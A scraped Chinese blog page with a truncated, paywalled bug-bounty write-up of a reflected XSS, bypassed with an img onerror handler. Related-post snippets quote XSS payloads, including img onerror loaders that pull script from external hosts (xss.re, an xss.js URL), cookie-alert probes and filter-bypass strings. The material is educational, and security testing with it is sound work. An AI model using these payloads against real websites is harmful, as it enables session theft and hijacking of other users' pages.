反射型XSS-利用img绕过班花存放私密照的方案

最新推荐文章于 2022-11-19 11:19:24 发布
VIP文章 最新推荐文章于 2022-11-19 11:19:24 发布
阅读量992 收藏
点赞数 2
文章标签: html html5 网络安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/120156844
版权

前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。 1、挖掘的起点源于对某页…

前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。

1、挖掘的起点源于对某页面url中title参数的测试,该参数提交后被反射回来

<span class="brand\_left\_txt1" id="city">title</span>

2、测试符号

站点未对<>;=’”(){}进行过滤或者转义处理。(事实证明,我高兴早了~)

3、测试script标签

script被替换为了[removed]进行占位,尝试了大小写混杂,无效

4、其它标签

result.png

* 结果是ok的,在当前页面加载显示了百度的logo

5、尝试利用标签的属性和事件

这里有两个注意点:

1)如何触发事件

这里将src写为一个错误的地址,即可触发onerror事件

2)如何写事件

在这里,第一个难点是对alert、write等方法名进行了转换,转换为[removed]

最低0.47元/天 解锁文章
网安溦寀
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Xssimg标签的一些利用
weixin_34358365的博客
02-05 2129
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img> “><img src=x onerror=”with(document)body.appendChild(createElemen...
XSS漏洞详解以及绕过方式。
m0_63028223的博客
05-14 1455
下列以dvwa靶场为例: 反射XSS: LOW级别 <script>alert('test')</script> 最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。 medium级别 可能过滤了js标签,我们使用input标签, <input onblur=alert`1`>当input失去焦点时会触发 <input onclick=alert `123'> 当input获取焦点(点击输入)时触发
XSS讲解下(web安全入门11)
黑战士的博客
05-15 1607
一、XSS 的构造 1.1 利用[<>]构造 HTML/JS 可以利用[<>]构造 HTML 标签和] 1.2 伪协议 亦可以使用 JavaScript:伪协议的方式构造 XSS 在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功 提交参数[click me!] 点击超链接。即可触发 XSS 也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功 [<img src="javascript:alert(/XSS/)">
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5098
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
【自用】xsspayload
头发和技术只能选择一个
09-28 321
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 <IMG “”">”> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略…S’)> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC
第十三节 利用CSS特性绕过XSS过滤-01
09-15
第十三节 利用CSS特性绕过XSS过滤-01
第十二节 利用IE特性绕过XSS过滤-01
09-15
第十二节 利用IE特性绕过XSS过滤-01
第十六节 unicode绕过过滤触发XSS-01
09-15
第十六节 unicode绕过过滤触发XSS-01
第十节 绕过过滤domain为空的XSS-01
09-15
第十节 绕过过滤domain为空的XSS-01
第十一节 绕过替换script和on事件的XSS-01
最新发布
09-15
第十一节 绕过替换script和on事件的XSS-01
网络安全(2) -- 关于一次XSS攻击-图片(img标签)的onerror事件
热门推荐
TaneRoom的博客
11-08 2万+
记一次XSS实战攻击
图片引用功能导致的XSS漏洞
yggcwhat
09-29 2335
图片引用功能导致的XSS漏洞
Web安全-XSS漏洞
道阻且长,行则将至。
01-07 8343
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在Web应用中的计算机安全漏洞,也是Web中最主流的攻击方式。那么什么是XSS呢?本文将进行学习、介绍。
转:XSS中的script标签与img标签
ahltg62444的专栏
07-31 619
我们知道XSS漏洞最常见的检测方式就是输入<script>alert(‘xss’)</script>来确认,大部分人在测试的时候就是直接使用类似<script>alert(‘xss’)</script>这样的输入,如果发现有弹出对话框就说明存在漏洞,如果没有对话框就认为不存在漏洞。那么,只使用<script>标签是否就足够了呢?...
前端常见安全漏洞
whaleluo的博客
05-11 1641
文章目录xss跨站脚本攻击csrf->xsrf跨站请求伪造攻击SSRF服务端请求构造点击劫持sql注入 xss跨站脚本攻击 以"文章发布系统"为例 input输入框输入字符串后使用v-html渲染成HTML显示在当前页面 当input输入script(sc里面的js不会执行) <script>alert(document.cookie)</script> 当input输入img标签的onerror回调(弹出cookie) <img src="test" on
过滤的绕过
weixin_53259175的博客
11-19 726
xss=111”%20onerror=location=“javasc”%2b"ript:al"%2b"ert%25281%2529 可以看出弹窗实现,这里使用了字符串拼接的方法进行了关键字的绕过。其中%2b是字符+的url编码,js中的字符拼接也是使用+字符来实现的。xss=111"%20onerror=location=“javasc”%2b"ript:prompt%25281%2529 可以发现弹窗也可以实现,这里使用了其他的弹窗方法绕过,所以也可以使用其他未过滤且功能相同的方法来绕过
反射XSS攻击
weixin_62976579的博客
09-16 543
简单的反射XSS
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1541
网络安全笔记
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2268
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
存储xss反射xss有哪些异同点
05-12
2. 攻击原理:存储 XSS反射 XSS 都是利用了 Web 应用程序对用户输入数据的信任,通过篡改 Web 页面中的数据来实现攻击。 3. 危害程度:存储 XSS反射 XSS 都能够导致用户的隐私泄露、账号被盗、系统被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值